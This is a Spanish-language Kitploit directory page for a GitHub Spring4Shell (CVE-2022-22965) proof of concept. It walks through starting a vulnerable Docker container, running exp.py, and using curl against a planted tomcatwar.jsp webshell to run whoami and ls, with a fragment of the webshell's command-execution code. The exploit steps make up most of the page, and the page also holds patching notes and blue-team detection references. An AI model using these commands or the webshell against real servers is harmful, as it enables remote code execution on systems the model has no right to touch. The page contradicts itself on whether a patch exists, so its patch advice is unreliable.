Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SpringShell — Spring4Shell - Spring Core RCE - CVE-2022-22965 | Kitploit
Herramientas/GitHubGitHub/thegejr/springshell
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubthegejr/springshell

SpringShell

Spring4Shell - Spring Core RCE - CVE-2022-22965

Ver Repositorio
131821hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Spring Core RCE - CVE-2022-22965

Después de Spring Cloud, el 29 de marzo, otra vulnerabilidad de gran peso de Spring estalló en Internet: Spring Core RCE

El 31 de marzo Spring publicó nuevas versiones que corrigen la vulnerabilidad. Véase la sección Parcheo.

El 31 de marzo se asignó finalmente un número CVE a la vulnerabilidad con una puntuación CVSS de 9.8 (CRÍTICA)

Prueba de concepto

El exploit es muy fácil de usar, de ahí la puntuación CVSS tan alta de 9.8.

Para probar la vulnerabilidad, puedes hacer lo siguiente.

Inicia una imagen Docker vulnerable de Spring.

root@kitploit:~
docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

Esto vincula la instancia vulnerable de Spring a la dirección localhost:8082.

Verifica que la imagen se haya iniciado correctamente con curl.

root@kitploit:~
curl http://localhost:8082

Se debería devolver una respuesta ok.

¡Explotemos ahora la imagen vulnerable!

root@kitploit:~
Descargar herramienta
python3 exp.py --url http://localhost:8082

Se debería devolver una respuesta de The vulnerability exists .....

Ahora puedes explotar la vulnerabilidad con curl.

root@kitploit:~
# Execute command whoami
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami

# Response has been truncated
root

//
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } - ........

# Execute command ls
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls

# Response has been truncated
app
bin
dev
etc
..........

Código PoC en circulación

El exploit se ha subido hasta ahora como exp.py
Código PoC en circulación
situación incómoda

Parcheo

Spring ha publicado ahora nuevas versiones que solucionan esta CVE. Véase el anuncio de Spring.

El commit que parcheó la vulnerabilidad

Impacto de la vulnerabilidad

  1. Versión de JDK 9 o superior
  2. Se utilizan Spring Framework o frameworks derivados

Sugerencia para corregir el error

Actualmente, Spring no ha publicado oficialmente un parche; se recomienda reducir la versión de JDK como solución temporal.

Equipo azul

Yara

  • Florian Roth - Webshells de Spring4Shell

Sigma

  • Emanuele De Lucia - Creación de webshells .jsp

SPLUNK

  • Alex John - SPL de detección de Splunk